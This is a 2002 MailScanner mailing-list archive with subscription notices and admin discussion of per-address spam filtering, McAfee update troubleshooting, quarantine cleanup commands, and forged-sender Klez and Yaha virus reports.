>> Our virus detector has just been triggered by a message you sent:- >> To: >> Subject: Undelivered Mail Returned to Sender -New Text Document >> Date: Sat Sep 14 17:36:13 2002 >> Any infected parts of the message have not been delivered. >> >> This message is simply to warn you that your computer system may have >> a virus present and should be checked. >> >> The virus detector said this about the message: >> Report: >>> Virus 'W32/Yaha-E' found in file ./g8E9YlCZ019838/New Text >> Document.jpg.pifShortcuts to MS-Dos programs are very dangerous in >> email > (New Text >> Document.jpg.pif) >> >> ------------------------------------- >> STII E-mail Virus Protection Service >> postmaster@stii.dost.gov.ph >> >> **END OF EMAIL****** >> >> Thanks and more power to Mailscanner. >> >> Domingo Genaro P. Tamayo >> SRS-I >> (STII-DOST PH) From billa at STERLING.NET Mon Sep 16 16:04:15 2002 From: billa at STERLING.NET (Bill Anderson) Date: Thu Jan 12 21:15:39 2006 Subject: Selective spam filtering? In-Reply-To: <5.1.0.14.2.20020913171328.04a44c30@imap.ecs.soton.ac.uk> Message-ID: Any more thoughts? >> I'll have to think about that one... At 16:43 13/09/2002, you wrote: >I have been playing around with the whitelist, but I can't seem to figure >out the best way to accomplish what I need. > >Basically I have a domain, somedomain.com, which has about 3000 email >accounts on another mail server. Only about 100 of the accounts want spam >filtering. From what I can see with the whitelist, I need to put 2990 To: >accounts in the whitelist. I guess it could be done, but it would be a >management nightmare. > >Is there an easier way to just identify the 100 accounts as getting >filtered, while leaving the other 2990 unfiltered. Thanks. > >At 02:56 13/09/2002, you wrote: > >I am currently using mailscanner with spamassassin and sendmail. I am only > >using the spam feature to filter spam for specific domains that are hosted > >on other mail servers. Can I only spam filter for certain addresses in the > >domain, while letting everything else through? > > > >someone@somedomain.com gets filtered > >*@somedomain.com no filtering > > > >Is this possible with my config? > >Yes, the spam whitelist lets you do exactly this. Take a look at the sample >supplied spam.whitelist.conf file. >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From LISTSERV at JISCMAIL.AC.UK Fri Sep 13 17:21:29 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:39 2006 Subject: MAILSCANNER: fox30_dawgs@FOXRANGERS.COM requested to join Message-ID: <200209131621.RAA11104@magpie.ecs.soton.ac.uk> Fri, 13 Sep 2002 17:21:29 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from GerryD Hunter . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER fox30_dawgs@FOXRANGERS.COM GerryD Hunter The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+fox30_dawgs%40FOXRANGERS.COM+GerryD+Hunter&L=MAILSCANNER ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Fri, 13 Sep 2002 17:21:29 +0100 Received: from web3.bluedomino.net ([64.49.219.141]) by ori.rl.ac.uk (8.11.1/8.11.1) with SMTP id g8DGLQr15552 for ; Fri, 13 Sep 2002 17:21:26 +0100 Received: (qmail 15803 invoked by uid 0); 13 Sep 2002 16:14:42 -0000 Date: 13 Sep 2002 16:14:42 -0000 Message-ID: <20020913161442.15802.qmail@web3.bluedomino.net> From: Matt Subject: ok To: LISTSERV@JISCMAIL.AC.UK MIME-Version: 1.0 Content-Type: TEXT/plain; CHARSET=US-ASCII Content-Description: text message From smohan at VSNL.COM Mon Sep 16 03:18:25 2002 From: smohan at VSNL.COM (S Mohan) Date: Thu Jan 12 21:15:39 2006 Subject: [OT] Mailscanner and McAfee In-Reply-To: <000e01c25cc7$24a1b560$4c00a8c0@escritoriomundial.com.br> Message-ID: <000e01c25d27$585776f0$01000001@mohans> Continuing on the licencing front. Is McAfee command line uvscan a server licene or do we have to pay by no of mailboxes? Not very clear to me. Mohan From LISTSERV at JISCMAIL.AC.UK Fri Sep 13 20:48:29 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:39 2006 Subject: MAILSCANNER: skd@CYPRESS.COM requested to join Message-ID: <200209131948.UAA00435@magpie.ecs.soton.ac.uk> Fri, 13 Sep 2002 20:48:29 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Skip Duckwall . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER skd@CYPRESS.COM Skip Duckwall The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+skd%40CYPRESS.COM+Skip+Duckwall&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From LISTSERV at JISCMAIL.AC.UK Sat Sep 14 03:05:22 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:40 2006 Subject: MAILSCANNER: bob.debolt@TELUSPLANET.NET requested to join Message-ID: <200209140205.DAA25994@magpie.ecs.soton.ac.uk> Sat, 14 Sep 2002 03:05:22 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Bob DeBolt . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER bob.debolt@TELUSPLANET.NET Bob DeBolt The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+bob.debolt%40TELUSPLANET.NET+Bob+DeBolt&L=MAILSCANNER ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Sat, 14 Sep 2002 03:05:22 +0100 Received: from priv-edtnes11-hme0.telusplanet.net (fepout3.telus.net [199.185.220.238]) by ori.rl.ac.uk (8.11.1/8.11.1) with ESMTP id g8E25Kr02847 for ; Sat, 14 Sep 2002 03:05:20 +0100 Received: from occ-1oppr.telusplanet.net ([66.222.229.4]) by priv-edtnes11-hme0.telusplanet.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with ESMTP id <20020914020513.YAVQ22374.priv-edtnes11-hme0.telusplanet.net@occ-1oppr.telusplanet.net> for ; Fri, 13 Sep 2002 20:05:13 -0600 Message-Id: <5.1.0.14.0.20020913202052.00af4490@pop.telusplanet.net> X-Sender: mrdebolt@pop.telusplanet.net X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Fri, 13 Sep 2002 20:21:07 -0600 To: "L-Soft list server at JISCMAIL (1.8e)" From: Bob DeBolt Subject: Re: Command confirmation request (8C5145C8) In-Reply-To: <20020914015546.YHUE25540.priv-edtnes10-hme0.telusplanet.ne t@smtp.jiscmail.ac.uk> Mime-Version: 1.0 X-LSVline1: ok From LISTSERV at JISCMAIL.AC.UK Sat Sep 14 20:51:47 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:40 2006 Subject: MAILSCANNER: john@SME-ECOM.CO.UK requested to join Message-ID: <200209141951.UAA19357@magpie.ecs.soton.ac.uk> Sat, 14 Sep 2002 20:51:47 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from John Walker . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER john@SME-ECOM.CO.UK John Walker The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+john%40SME-ECOM.CO.UK+John+Walker&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From LISTSERV at JISCMAIL.AC.UK Sun Sep 15 12:37:54 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:40 2006 Subject: MAILSCANNER: mike@4FRONTMEDIA.NET left the list Message-ID: <200209151137.MAA28616@magpie.ecs.soton.ac.uk> Sun, 15 Sep 2002 12:37:54 Mike Walker has just signed off the MAILSCANNER list (MailScanner mailing list). ------------------------- Original mail header -------------------------- Return-Path: Received: from 130.246.192.52 by JISCMAIL.AC.UK (SMTPL release 1.0f) with TCP; Sun, 15 Sep 2002 12:37:54 +0100 Received: from cobalt100.fm.netbenefit.co.uk ([212.53.85.182]) by ori.rl.ac.uk (8.11.1/8.11.1) with ESMTP id g8FBbqr15002 for ; Sun, 15 Sep 2002 12:37:52 +0100 Received: from 4frontmedia.co.uk (du-069-0430.access.clara.net [217.158.145.176]) by cobalt100.fm.netbenefit.co.uk (8.10.2/8.10.2) with ESMTP id g8FBjWo07234 for ; Sun, 15 Sep 2002 12:45:32 +0100 Received: from MIKES [10.0.0.3] by 4frontmedia.co.uk (FTGate 2, 2, 4, 1); Sun, 15 Sep 2002 12:37:19 +0100 Reply-To: From: "Mike Walker" To: Subject: SIGNOFF MAILSCANNER Date: Sun, 15 Sep 2002 12:21:15 +0100 Message-ID: <001201c25caa$01fe1660$0300000a@4> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 X-VITANIUM: Found to be clean From LISTSERV at JISCMAIL.AC.UK Sun Sep 15 20:35:13 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:40 2006 Subject: MAILSCANNER: dirk@DREES-CLAN.DE requested to join Message-ID: <200209151935.UAA21995@magpie.ecs.soton.ac.uk> Sun, 15 Sep 2002 20:35:13 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Dirk Drees . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER dirk@DREES-CLAN.DE Dirk Drees The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+dirk%40DREES-CLAN.DE+Dirk+Drees&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From LISTSERV at JISCMAIL.AC.UK Mon Sep 16 18:22:59 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:40 2006 Subject: MAILSCANNER: rvitoria@CI.UCP.PT requested to join Message-ID: <200209161723.SAA05965@magpie.ecs.soton.ac.uk> Mon, 16 Sep 2002 18:22:59 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Rui Vit?ria . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER rvitoria@CI.UCP.PT Rui Vit?ria The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+rvitoria%40CI.UCP.PT+Rui+Vit%F3ria&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From mailscanner at ecs.soton.ac.uk Mon Sep 16 20:19:47 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:40 2006 Subject: mime-tools-patch2.txt missing In-Reply-To: <200209160654.g8G6sor08203@ori.rl.ac.uk> Message-ID: <5.1.0.14.2.20020916201933.022ecd50@imap.ecs.soton.ac.uk> At 07:54 16/09/2002, you wrote: >Please disregard. I found it inside the new MailScanner package. The link >from the website is still broken though. =) Thanks for letting me know. Fixed now. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Mon Sep 16 20:10:11 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:40 2006 Subject: [OT] Mailscanner and McAfee In-Reply-To: <000e01c25d27$585776f0$01000001@mohans> References: <000e01c25cc7$24a1b560$4c00a8c0@escritoriomundial.com.br> Message-ID: <5.1.0.14.2.20020916200929.022af250@imap.ecs.soton.ac.uk> At 03:18 16/09/2002, you wrote: >Continuing on the licencing front. Is McAfee command line uvscan a >server licene or do we have to pay by no of mailboxes? Not very clear to >me. You probably have to paid per mailbox. F-Prot are about the only people who do per-server licensing. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Mon Sep 16 20:30:29 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:40 2006 Subject: Selective spam filtering? In-Reply-To: References: <5.1.0.14.2.20020913171328.04a44c30@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020916202403.0344c3e0@imap.ecs.soton.ac.uk> At 16:04 16/09/2002, you wrote: >Any more thoughts? In V4, it will be something like Spam Checks = /usr/local/MailScanner/etc/rules/spam.checks.rules then in that file To: account1@domain.com yes To: account2@domain.com yes To: account3@domain.com yes To: *@domain.com no Then it will do spam scanning for account1,2,3 and not for any of the other accounts at domain.com. For those of you that are wondering, this is the form of the generalised ruleset configuration system in V4, with which you can pull all sorts of useful tricks (yes, you can even make that outgoing mail directory (/var/spool/mqueue) dependent on the addressing of the message, so you can send incoming mail into 1 queue while sending outbound mail into another queue if you want to). There are a few other rule types other than the 2 above, leaving you the ability to test on just about anything to do with where the mail came from or where it is going. I haven't yet managed to come up with the reason *why* you might want to do some of the more obscure configurations that are possible, but I'm working on it :-) > >> I'll have to think about that one... > >At 16:43 13/09/2002, you wrote: > >I have been playing around with the whitelist, but I can't seem to figure > >out the best way to accomplish what I need. > > > >Basically I have a domain, somedomain.com, which has about 3000 email > >accounts on another mail server. Only about 100 of the accounts want spam > >filtering. From what I can see with the whitelist, I need to put 2990 To: > >accounts in the whitelist. I guess it could be done, but it would be a > >management nightmare. > > > >Is there an easier way to just identify the 100 accounts as getting > >filtered, while leaving the other 2990 unfiltered. Thanks. > > > >At 02:56 13/09/2002, you wrote: > > >I am currently using mailscanner with spamassassin and sendmail. I am >only > > >using the spam feature to filter spam for specific domains that are >hosted > > >on other mail servers. Can I only spam filter for certain addresses in >the > > >domain, while letting everything else through? > > > > > >someone@somedomain.com gets filtered > > >*@somedomain.com no filtering > > > > > >Is this possible with my config? > > > >Yes, the spam whitelist lets you do exactly this. Take a look at the sample > >supplied spam.whitelist.conf file. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Mon Sep 16 20:14:25 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:40 2006 Subject: Mailscanner and McAfee In-Reply-To: <000e01c25cc7$24a1b560$4c00a8c0@escritoriomundial.com.br> References: Message-ID: <5.1.0.14.2.20020916201113.02255068@imap.ecs.soton.ac.uk> At 15:49 15/09/2002, you wrote: >I've instaled Mailscanner with McAfee and when i run ./autoupdate it >gives this error: >McAfee update failed: cannot find the update file, at ./autoupdate line >93. >Can somebody help me here? Just above line 52, add a line like this: print STDERR "File is directory is $file\n"; That will make it print out the filenames that it finds in that directory. Are you behind an FTP proxy or anything like that? You can always do the FTP by hand: ftp ftp.nai.com user: ftp password: anonymous@jiscmail.ac.uk cd /pub/antivirus/datfiles/4.x/ dir and see what it says. It should include a file called something along the lines of dat-*.tar -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Mon Sep 16 20:00:21 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:40 2006 Subject: multiple mailscanner instances? In-Reply-To: <1031964261.1829.100.camel@wilowisp.dynetics.com> References: Message-ID: <5.1.0.14.2.20020916195943.03436e88@imap.ecs.soton.ac.uk> At 01:44 14/09/2002, you wrote: >Julian could provide the best analysis, but a quick read of the code >said to me that it scans the input queue and identifies "Max >Safe|Unsafe" sized batch of messages to process. The header data of >those are written into MailScanners incoming directory >(xxxxxxxxxx.header) and an internal list is constructed. Then it >processes each message in that batch. The original copy of each message >remains in the input queue until processing of that batch is complete. > >So running more than one instance on the same input queue and with the >same work dirs isn't going to work, if I read the code correctly. At the >very least you'd get duplicate delivery of at least some messages. Exactly right. >Distributing the input queue to multiple processing queues is cheap, >because it's just a "mv" of the qf/df pair. If you are interested I can >clean up the queue mgmt code and document how I do it on a server that >handles some 150-180K messages a day. Waiting for V4 is much easier :-) -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Mon Sep 16 20:21:45 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:40 2006 Subject: Virus on Email Server itself? In-Reply-To: <1559.10.10.140.42.1032157416.squirrel@itdgate.stii.dost.go v.ph> References: <5.1.0.14.2.20020910115705.053d2b88@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020910090642.04ea1dc0@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020910115705.053d2b88@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020916202017.0237c368@imap.ecs.soton.ac.uk> This is all fallout of the Klez virus. This virus fakes the "From" and the "To" addresses, so don't take much notice of infection reports about it. Recent versions of MailScanner take this into account and do not send out warnings to the supposed senders of such messages. At 07:23 16/09/2002, you wrote: >Good Day >Im just wondering why do our MAILER-DEAMON sends a virus infected email. >Here's a sample email sent by Mailscanner. Is it possible that anti-virus >engine doesn't clean that infected email? >**START OF EMAIL****** >Subject: Warning: E-mail viruses detected View Full Header >View Printable Version >From: "STII Mail Scanner" >Date: Sat, September 14, 2002 5:36 pm >To: >Priority: Normal > >Our virus detector has just been triggered by a message you sent:- > To: > Subject: Undelivered Mail Returned to Sender -New Text Document > Date: Sat Sep 14 17:36:13 2002 >Any infected parts of the message have not been delivered. > >This message is simply to warn you that your computer system may have a >virus present and should be checked. > >The virus detector said this about the message: >Report: >>> Virus 'W32/Yaha-E' found in file ./g8E9YlCZ019838/New Text >Document.jpg.pifShortcuts to MS-Dos programs are very dangerous in email >(New Text >Document.jpg.pif) > >------------------------------------- >STII E-mail Virus Protection Service >postmaster@stii.dost.gov.ph > >**END OF EMAIL****** > >Thanks and more power to Mailscanner. > >Domingo Genaro P. Tamayo >SRS-I >(STII-DOST PH) -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Mon Sep 16 20:07:14 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:40 2006 Subject: Feature, maybe misfeature In-Reply-To: <1036.65.170.190.179.1031969422.squirrel@www.abi.tconline.n et> References: <20020914003637.GK12747@hoiho.nz.lemon-computing.com> Message-ID: <5.1.0.14.2.20020916200214.0235a0d0@imap.ecs.soton.ac.uk> At 03:10 14/09/2002, you wrote: > >> > What I haven't got written yet is a "spamsweeper" script which > >> lazily runs in the background at a low 19 nice priority all the > >> time, going through all of the .spam files and deleting any message > >> older than x days. > >> > >> Such a thing already exists; I noticed it in the Debian package > >> listing the other week. I'm afraid I can't remember what it's called > >> though. > > >I made one when I was trying to learn Python. I use it to delete >everything recursively in the quarantine dir older than ten days. You can >do the same thing though with one line and "find". As no-one seems to have posted anything, how about a line like this which will delete all files under the current directory more than 14 days old: find . -type f -mtime +14 -print | xargs rm -f rmdir */* rmdir * The "rmdir" commands will only succeed on empty directories, they don't delete directories that have anything in them. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Mon Sep 16 19:57:57 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:40 2006 Subject: logging In-Reply-To: <1031939400.1830.11.camel@wilowisp.dynetics.com> References: <5.1.0.14.2.20020913080850.04a1e008@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020912224819.0230ef68@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020912224819.0230ef68@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020913080850.04a1e008@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020916195640.03453e18@imap.ecs.soton.ac.uk> At 18:49 13/09/2002, you wrote: >On Fri, 2002-09-13 at 02:09, Julian Field wrote: > > At 23:32 12/09/2002, you wrote: > > > > > >If that sort of information was going to be logged, and I'm not sure if > > >that is something that MailScanner ought to be doing, it would seem to > > >me that it would make more sense to push the data into a file or a DB. > > >Syslog isn't very flexible in its logging format and we are talking > > >about a big growth in the log files. Seems to me that if it were going > > >into a separate log file or a DB the results would be easier to parse > > >and the maillog would remain more reasonable. The downside of that kind > > >of additional logging is that it is going to slow down MailScanner and > > >the code will be larger and more complex. > > > > Syslog already has hooks in it so that you can log to whatever file or > > program you like, I'm not going to re-invent the wheel :) > > >Good point, it does keep the program logic a bit simpler. I guess my >point was that for this particular type of logging some other method >might be worth the increased complexity. It might be good to poll and >see how valuable such an option would be. True enough. It's pretty simple to re-write the MailScanner::Log module to send the logging into something of your own creation. I suspect I'll leave that as an exercise for the reader :) -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From Denis.Beauchemin at USHERBROOKE.CA Mon Sep 16 21:10:20 2002 From: Denis.Beauchemin at USHERBROOKE.CA (Denis Beauchemin) Date: Thu Jan 12 21:15:40 2006 Subject: Feature, maybe misfeature In-Reply-To: <5.1.0.14.2.20020916200214.0235a0d0@imap.ecs.soton.ac.uk> References: <20020914003637.GK12747@hoiho.nz.lemon-computing.com> <5.1.0.14.2.20020916200214.0235a0d0@imap.ecs.soton.ac.uk> Message-ID: <1032207021.28021.35.camel@dbeauchemin.si.usherb.ca> On Mon, 2002-09-16 at 15:07, Julian Field wrote: > > As no-one seems to have posted anything, how about a line like this which > will delete all files under the current directory more than 14 days old: > find . -type f -mtime +14 -print | xargs rm -f I'd recommend using: find . -type f -mtime +14 -print0 | xargs -0 rm -f That way you won't get into trouble if a file name contains spaces or some other strange character. Find puts a null character at the end of each file name and xargs expects null-separated arguments. Denis -- Denis Beauchemin, analyste Universit? de Sherbrooke, S.T.I. T: 819.821.8000x2252 F: 819.821.8045 From LISTSERV at JISCMAIL.AC.UK Mon Sep 16 21:16:36 2002 From: LISTSERV at JISCMAIL.AC.UK (L-Soft list server at JISCMAIL (1.8e)) Date: Thu Jan 12 21:15:40 2006 Subject: MAILSCANNER: brad_patterson@USROBOTICS.COM requested to join Message-ID: <200209162016.VAA21936@magpie.ecs.soton.ac.uk> Mon, 16 Sep 2002 21:16:36 A request for subscription to the MAILSCANNER list (MailScanner mailing list) has been received from Brad Patterson . You can, at your discretion, send the following command to LISTSERV@JISCMAIL.AC.UK to add this person to the list: ADD MAILSCANNER brad_patterson@USROBOTICS.COM Brad Patterson The simplest way to do this is to click on the following link: http://jiscmail.ac.uk/cgi-bin/wa.exe?LCMD=ADD+MAILSCANNER+brad_patterson%40USROBOTICS.COM+Brad+Patterson&L=MAILSCANNER ------------------------- Original mail header -------------------------- [Request submitted through anonymous TCP/IP interface from 127.0.0.1] From roberto at MEUPROVEDOR.COM.BR Mon Sep 16 21:44:19 2002 From: roberto at MEUPROVEDOR.COM.BR (Roberto Campos) Date: Thu Jan 12 21:15:40 2006 Subject: RES: Mailscanner and McAfee In-Reply-To: <5.1.0.14.2.20020916201113.02255068@imap.ecs.soton.ac.uk> Message-ID: <004e01c25dc1$d8c90840$4c00a8c0@escritoriomundial.com.br> Hi, At 15:49 15/09/2002, you wrote: >I've instaled Mailscanner with McAfee and when i run ./autoupdate it >gives this error: >McAfee update failed: cannot find the update file, at ./autoupdate line >93. >Can somebody help me here? Just above line 52, add a line like this: print STDERR "File is directory is $file\n"; That will make it print out the filenames that it finds in that directory. Still got the same error. McAfee update failed: cannot find the update file, at ./autoupdate line 93. It doesn't even print that line on 51... > Are you behind an FTP proxy or anything like that? I'm behind a firewall, but I've tried the ftp by hand and it works... > You can always do the FTP by hand: > ftp ftp.nai.com > user: ftp > password: anonymous@jiscmail.ac.uk > cd /pub/antivirus/datfiles/4.x/ > dir >and see what it says. It should include a file called something along the >lines of > dat-*.tar This Works. Thanks. Roberto. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From billa at STERLING.NET Mon Sep 16 23:39:49 2002 From: billa at STERLING.NET (Bill Anderson) Date: Thu Jan 12 21:15:40 2006 Subject: Selective spam filtering? In-Reply-To: <5.1.0.14.2.20020916202403.0344c3e0@imap.ecs.soton.ac.uk> Message-ID: Perfect...that is what I need. Any idea on when V4? ======================= At 16:04 16/09/2002, you wrote: >Any more thoughts? In V4, it will be something like Spam Checks = /usr/local/MailScanner/etc/rules/spam.checks.rules then in that file To: account1@domain.com yes To: account2@domain.com yes To: account3@domain.com yes To: *@domain.com no Then it will do spam scanning for account1,2,3 and not for any of the other accounts at domain.com. For those of you that are wondering, this is the form of the generalised ruleset configuration system in V4, with which you can pull all sorts of useful tricks (yes, you can even make that outgoing mail directory (/var/spool/mqueue) dependent on the addressing of the message, so you can send incoming mail into 1 queue while sending outbound mail into another queue if you want to). There are a few other rule types other than the 2 above, leaving you the ability to test on just about anything to do with where the mail came from or where it is going. I haven't yet managed to come up with the reason *why* you might want to do some of the more obscure configurations that are possible, but I'm working on it :-) > >> I'll have to think about that one... > >At 16:43 13/09/2002, you wrote: > >I have been playing around with the whitelist, but I can't seem to figure > >out the best way to accomplish what I need. > > > >Basically I have a domain, somedomain.com, which has about 3000 email > >accounts on another mail server. Only about 100 of the accounts want spam > >filtering. From what I can see with the whitelist, I need to put 2990 To: > >accounts in the whitelist. I guess it could be done, but it would be a > >management nightmare. > > > >Is there an easier way to just identify the 100 accounts as getting > >filtered, while leaving the other 2990 unfiltered. Thanks. > > > >At 02:56 13/09/2002, you wrote: > > >I am currently using mailscanner with spamassassin and sendmail. I am >only > > >using the spam feature to filter spam for specific domains that are >hosted > > >on other mail servers. Can I only spam filter for certain addresses in >the > > >domain, while letting everything else through? > > > > > >someone@somedomain.com gets filtered > > >*@somedomain.com no filtering > > > > > >Is this possible with my config? > > > >Yes, the spam whitelist lets you do exactly this. Take a look at the sample > >supplied spam.whitelist.conf file. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From hciss at HCIWS.COM Tue Sep 17 00:24:43 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:40 2006 Subject: OT: W32/Klez.H@mm Message-ID: <003a01c25dd8$3fcfd760$6701a8c0@matthew> Does this thing ever go away? I am tempted to setup Mailscanner to quietly delete this one. What is the deal, why does it just keep floating around? Don't the senders care they have a virus on there PC? Matt Report: /var/spool/MailScanner/incoming/g8G2fWA11363/Pxt.exe Infection: W32/Klez.H@mm From mkettler at EVI-INC.COM Tue Sep 17 00:50:30 2002 From: mkettler at EVI-INC.COM (Matt Kettler) Date: Thu Jan 12 21:15:40 2006 Subject: OT: W32/Klez.H@mm In-Reply-To: <003a01c25dd8$3fcfd760$6701a8c0@matthew> Message-ID: <5.1.1.6.0.20020916194416.01b08cf8@192.168.50.2> In most cases, the senders don't know, because klez works hard to make it difficult to figure out who is infected and sent the virus. Certainly automated MailScanner notices are NOT going to the correct sender. People who detect the virus incoming have to do a lot of detective work to tell the person sending the virus that they are infected. All of the from's are forged, including the envelope, so you can only reduce the set based on the MX that transferred it, and look for other people who email you that use that same MX. If it's the MX of a large ISP, this becomes difficult.. you can track it back to the originating IP, but if it's a dialin, you've really only limited yourself to one dialing area for one ISP. If you have 20 friends or mailing list members in one town who all use the same local ISP, it's very tough to narrow it down. Often you might not even normally get email from that person via that ISP because they may only email you via yahoo webmail, etc.. At 06:24 PM 9/16/2002 -0500, Matt wrote: >Does this thing ever go away? I am tempted to setup Mailscanner to quietly >delete this one. What is the deal, why does it just keep floating around? >Don't the senders care they have a virus on there PC? From Janssen at RZ.UNI-FRANKFURT.DE Tue Sep 17 01:24:18 2002 From: Janssen at RZ.UNI-FRANKFURT.DE (Michael Janssen) Date: Thu Jan 12 21:15:40 2006 Subject: OT: W32/Klez.H@mm In-Reply-To: <5.1.1.6.0.20020916194416.01b08cf8@192.168.50.2> Message-ID: On Mon, 16 Sep 2002, Matt Kettler wrote: > In most cases, the senders don't know, because klez works hard to make it > difficult to figure out who is infected and sent the virus. and difficult to remove. Sophos explanation for disinfection is pretty long. User give up before try. Michael From funk.gabor at HUNETKFT.HU Tue Sep 17 06:05:08 2002 From: funk.gabor at HUNETKFT.HU (Funk Gabor) Date: Thu Jan 12 21:15:40 2006 Subject: W32/Klez.H@mm References: Message-ID: 